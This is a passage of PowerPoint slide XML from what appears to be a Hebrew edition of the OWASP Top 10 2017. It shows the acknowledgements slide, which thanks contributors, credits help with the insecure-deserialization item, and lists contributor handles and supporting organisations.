                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Twitter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, דואר אלקטרוני, וכל אמצעי אחר.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans"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he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>זה יהיה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> רשלני מצדנו שלא להזכיר ש-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dirk Wetter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Jim </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manico</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Osama </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Elnaggar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> סיפקו סיוע רב.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כמו-כן, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Chris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Frohoff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Gabriel Lawrence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> סיפקו סיוע שלא</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> יסולא בפז בכתיבת הפגיעות החדשה </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> פתיחה </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>לא מאובטחת של רצף סדרתי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="3113917270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2C6CA28A-C875-42F4-A969-9E4EBCDC2625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5202070"/>
            <a:ext cx="6858000" cy="3105345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="5" spcCol="274320" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82800" indent="-82800" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ak47gen</a:t>
            </a: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alonergan</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ameft</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anantshri</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bandrzej</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bchurchill</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binarious</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bkimminich</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Boberski</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borischen</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Calico90</a:t>
            </a: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chrish</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clerkendweller</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D00gs</a:t>
            </a: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davewichers</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drkknight</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drwetter</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dune73</a:t>
            </a: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ecbftw</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einsweniger</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ekobrin</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eoftedal</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frohoff</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fzipi</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gebl</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gilc83</a:t>
            </a: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gilzow</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>global4g</a:t>
            </a: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grnd</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>h3xstream</a:t>
            </a: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hiralph</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HoLyVieR</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ilatypov</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irbishop</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itscooper</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ivanr</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jeremylong</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jhaddix</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jmanico</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joaomatosf</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jrmithdobbs</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jsteven</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jvehent</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katyanton</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kerberosmansour</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koto</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>m8urnett</a:t>
            </a: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mwcoates</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>neo00</a:t>
            </a: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nickthetait</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ninedter</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ossie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-git</a:t>
            </a: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PauloASilva</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PeterMosmans</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pontocom</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psiinon</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pwntester</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raesene</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riramar</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ruroot</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>securestep9</a:t>
            </a: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securitybits</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SPoint42</a:t>
            </a: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sreenathsasikumar</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>starbuck3000</a:t>
            </a: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stefanb</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sumitagarwalusa</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taprootsec</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tghosth</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TheJambo</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>thesp0nge</a:t>
            </a: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toddgrotenhuis</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troymarshall</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tsohlacol</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vdbaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yohgaki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1601670"/>
            <a:ext cx="6849278" cy="2655328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="4" spcCol="457200" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ANCAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aspect Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AsTech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Consulting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Atos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Branding Brand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bugcrowd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BUGemot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CDAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Checkmarx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Colegio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LaSalle Monteria</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Company.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ContextIS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Contrast Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DDoS.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Derek Weeks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
